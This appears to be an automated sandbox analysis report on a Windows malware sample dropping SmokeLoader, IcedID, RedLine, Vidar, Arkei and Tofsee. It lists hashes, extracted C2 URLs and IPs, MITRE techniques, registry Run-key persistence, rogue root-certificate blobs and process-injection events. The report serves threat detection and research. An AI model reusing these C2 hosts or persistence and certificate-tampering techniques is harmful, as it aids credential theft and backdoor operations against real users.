arkei | f767c98dd6218f19d0401ae5dd88c720635871c132f7486481735cab48b46d85

Analysis

max time kernel
143s
max time network
158s
platform
windows7_x64
resource
win7-en-20211208
submitted
16-12-2021 08:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

04f0c813898a774f38edb436ed2407bb.exe
Size

172KB
MD5

04f0c813898a774f38edb436ed2407bb
SHA1

249324be93de538e109ef16ef2247e9f7a59508b
SHA256

f767c98dd6218f19d0401ae5dd88c720635871c132f7486481735cab48b46d85
SHA512

023db89dbaa000eeac40be5a89b4880d9fd5c747e93f1ccd92a4d4a4e361bfe092e4a6d6c3b8436b7604be16db6d76b2aa47da9cd39ac123114a941cdaf1e0fb

Score

10^/10

arkei icedid redline smokeloader tofsee vidar 1002 22 3372020928 backdoor banker collection discovery evasion infostealer persistence spyware stealer trojan

Malware Config

Extracted

Family

smokeloader

Version

2020

http://host-data-coin-11.com/

http://file-coin-host-12.com/

http://srtuiyhuali.at/

http://fufuiloirtu.com/

http://amogohuigotuli.at/

http://novohudosovu.com/

http://brutuilionust.com/

http://bubushkalioua.com/

http://dumuilistrati.at/

http://verboliatsiaeeees.com/

rc4.i32

Extracted

Family

icedid

Campaign

3372020928

jeliskvosh.com

Extracted

Family

tofsee

mubrikych.top

oxxyfix.xyz

Extracted

Family

redline

Botnet

195.133.47.114:38127

Extracted

Family

vidar

Version

49.1

Botnet

1002

https://noc.social/@sergeev46

https://c.im/@sergeev47

Attributes

profile_id
1002

Signatures

Arkei
Arkei is an infostealer written in C++.
stealer arkei
IcedID, BokBot
IcedID is a banking trojan capable of stealing credentials.
trojan banker icedid
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 6 IoCs

Processes:

resource	yara_rule
behavioral1/memory/608-74-0x0000000000340000-0x00000000003A9000-memory.dmp	family_redline
C:\Users\Admin\AppData\Local\Temp\4BF6.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\4BF6.exe	family_redline
behavioral1/memory/1204-153-0x0000000001370000-0x000000000140E000-memory.dmp	family_redline
behavioral1/memory/1744-248-0x000000000041BAFE-mapping.dmp	family_redline
behavioral1/memory/2092-276-0x00000000004193DE-mapping.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

Arkei Stealer Payload 2 IoCs

stealer

Processes:

resource	yara_rule
behavioral1/memory/1304-107-0x0000000000220000-0x000000000023C000-memory.dmp	family_arkei
behavioral1/memory/1304-108-0x0000000000400000-0x00000000004D6000-memory.dmp	family_arkei

Vidar Stealer 2 IoCs

stealer

Processes:

resource	yara_rule
behavioral1/memory/1452-235-0x0000000000220000-0x00000000002F9000-memory.dmp	family_vidar
behavioral1/memory/1452-236-0x0000000000400000-0x0000000000542000-memory.dmp	family_vidar

Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file

Executes dropped EXE 16 IoCs

Processes:

98F5.exeEFFB.exeF71D.exeEFFB.exe9D4.exe1173.exe25BF.exe4BF6.exeotdrmhyj.exe6541.exeA657.exeADB7.exeB759.exesafas2f.exewhw.exe7z.exe

pid	process
520	98F5.exe
300	EFFB.exe
608	F71D.exe
1420	EFFB.exe
1304	9D4.exe
1940	1173.exe
1780	25BF.exe
1792	4BF6.exe
628	otdrmhyj.exe
1204	6541.exe
1616	A657.exe
1452	ADB7.exe
1672	B759.exe
1556	safas2f.exe
1944	whw.exe
2476	7z.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Deletes itself 1 IoCs

Processes:

pid process

1208

pid	process
1208

Loads dropped DLL 16 IoCs

Processes:

EFFB.exeregsvr32.exe9D4.exeADB7.exeRegAsm.execmd.exe7z.exe

pid	process
300	EFFB.exe
2032	regsvr32.exe
1304	9D4.exe
1304	9D4.exe
1304	9D4.exe
1304	9D4.exe
1304	9D4.exe
1452	ADB7.exe
1452	ADB7.exe
1452	ADB7.exe
1452	ADB7.exe
1744	RegAsm.exe
1744	RegAsm.exe
1744	RegAsm.exe
2448	cmd.exe
2476	7z.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

Processes:

explorer.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

safas2f.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"	safas2f.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs

Processes:

F71D.exe6541.exeA657.exesafas2f.exe

pid process

608 F71D.exe
1204 6541.exe
1616 A657.exe
1556 safas2f.exe
1556 safas2f.exe

pid	process
608	F71D.exe
1204	6541.exe
1616	A657.exe
1556	safas2f.exe
1556	safas2f.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

04f0c813898a774f38edb436ed2407bb.exeEFFB.exeB759.exewhw.exe

description	pid	process	target process
PID 972 set thread context of 1748	972	04f0c813898a774f38edb436ed2407bb.exe	04f0c813898a774f38edb436ed2407bb.exe
PID 300 set thread context of 1420	300	EFFB.exe	EFFB.exe
PID 1672 set thread context of 1744	1672	B759.exe	RegAsm.exe
PID 1944 set thread context of 2092	1944	whw.exe	RegAsm.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 12 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

04f0c813898a774f38edb436ed2407bb.exe98F5.exeEFFB.exe1173.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	04f0c813898a774f38edb436ed2407bb.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	98F5.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	EFFB.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	EFFB.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	1173.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	1173.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	1173.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	04f0c813898a774f38edb436ed2407bb.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	04f0c813898a774f38edb436ed2407bb.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	98F5.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	98F5.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	EFFB.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

ADB7.exeRegAsm.exe9D4.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	ADB7.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	RegAsm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	RegAsm.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	9D4.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	9D4.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	ADB7.exe

Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

1452 timeout.exe
2204 timeout.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

2072 taskkill.exe

pid	process
1452	timeout.exe
2204	timeout.exe

pid	process
2072	taskkill.exe

Modifies system certificate store 2 TTPs 7 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

safas2f.exe6541.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	safas2f.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	safas2f.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	safas2f.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	safas2f.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A	6541.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 0f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a2000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	6541.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 190000000100000010000000fd960962ac6938e0d4b0769aa1a64e26030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a1d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e709000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030353000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6502000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	6541.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

04f0c813898a774f38edb436ed2407bb.exe

pid	process
1748	04f0c813898a774f38edb436ed2407bb.exe
1748	04f0c813898a774f38edb436ed2407bb.exe
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

1208
Suspicious behavior: MapViewOfSection 8 IoCs

Processes:

04f0c813898a774f38edb436ed2407bb.exe98F5.exeEFFB.exe1173.exe

pid process

1748 04f0c813898a774f38edb436ed2407bb.exe
520 98F5.exe
1420 EFFB.exe
1940 1173.exe
1208
1208
1208
1208

pid	process
1208

Suspicious use of AdjustPrivilegeToken 16 IoCs

Processes:

4BF6.exe6541.exeRegAsm.exetaskkill.exeRegAsm.exe7z.exe

description	pid	process
Token: SeDebugPrivilege	1792	4BF6.exe
Token: SeDebugPrivilege	1204	6541.exe
Token: SeDebugPrivilege	1744	RegAsm.exe
Token: SeShutdownPrivilege	1208
Token: SeShutdownPrivilege	1208
Token: SeDebugPrivilege	2072	taskkill.exe
Token: SeShutdownPrivilege	1208
Token: SeShutdownPrivilege	1208
Token: SeDebugPrivilege	2092	RegAsm.exe
Token: SeShutdownPrivilege	1208
Token: SeRestorePrivilege	2476	7z.exe
Token: 35	2476	7z.exe
Token: SeSecurityPrivilege	2476	7z.exe
Token: SeSecurityPrivilege	2476	7z.exe
Token: SeShutdownPrivilege	1208
Token: SeShutdownPrivilege	1208

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

pid process

1208
1208
Suspicious use of SendNotifyMessage 2 IoCs

Processes:

pid process

1208
1208

pid	process
1208
1208

pid	process
1208
1208

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

04f0c813898a774f38edb436ed2407bb.exeEFFB.exe25BF.exe

description	pid	process	target process
PID 972 wrote to memory of 1748	972	04f0c813898a774f38edb436ed2407bb.exe	04f0c813898a774f38edb436ed2407bb.exe
PID 972 wrote to memory of 1748	972	04f0c813898a774f38edb436ed2407bb.exe	04f0c813898a774f38edb436ed2407bb.exe
PID 972 wrote to memory of 1748	972	04f0c813898a774f38edb436ed2407bb.exe	04f0c813898a774f38edb436ed2407bb.exe
PID 972 wrote to memory of 1748	972	04f0c813898a774f38edb436ed2407bb.exe	04f0c813898a774f38edb436ed2407bb.exe
PID 972 wrote to memory of 1748	972	04f0c813898a774f38edb436ed2407bb.exe	04f0c813898a774f38edb436ed2407bb.exe
PID 972 wrote to memory of 1748	972	04f0c813898a774f38edb436ed2407bb.exe	04f0c813898a774f38edb436ed2407bb.exe
PID 972 wrote to memory of 1748	972	04f0c813898a774f38edb436ed2407bb.exe	04f0c813898a774f38edb436ed2407bb.exe
PID 1208 wrote to memory of 520	1208		98F5.exe
PID 1208 wrote to memory of 520	1208		98F5.exe
PID 1208 wrote to memory of 520	1208		98F5.exe
PID 1208 wrote to memory of 520	1208		98F5.exe
PID 1208 wrote to memory of 300	1208		EFFB.exe
PID 1208 wrote to memory of 300	1208		EFFB.exe
PID 1208 wrote to memory of 300	1208		EFFB.exe
PID 1208 wrote to memory of 300	1208		EFFB.exe
PID 1208 wrote to memory of 608	1208		F71D.exe
PID 1208 wrote to memory of 608	1208		F71D.exe
PID 1208 wrote to memory of 608	1208		F71D.exe
PID 1208 wrote to memory of 608	1208		F71D.exe
PID 1208 wrote to memory of 608	1208		F71D.exe
PID 1208 wrote to memory of 608	1208		F71D.exe
PID 1208 wrote to memory of 608	1208		F71D.exe
PID 1208 wrote to memory of 2032	1208		regsvr32.exe
PID 1208 wrote to memory of 2032	1208		regsvr32.exe
PID 1208 wrote to memory of 2032	1208		regsvr32.exe
PID 1208 wrote to memory of 2032	1208		regsvr32.exe
PID 1208 wrote to memory of 2032	1208		regsvr32.exe
PID 300 wrote to memory of 1420	300	EFFB.exe	EFFB.exe
PID 300 wrote to memory of 1420	300	EFFB.exe	EFFB.exe
PID 300 wrote to memory of 1420	300	EFFB.exe	EFFB.exe
PID 300 wrote to memory of 1420	300	EFFB.exe	EFFB.exe
PID 300 wrote to memory of 1420	300	EFFB.exe	EFFB.exe
PID 300 wrote to memory of 1420	300	EFFB.exe	EFFB.exe
PID 300 wrote to memory of 1420	300	EFFB.exe	EFFB.exe
PID 1208 wrote to memory of 1304	1208		9D4.exe
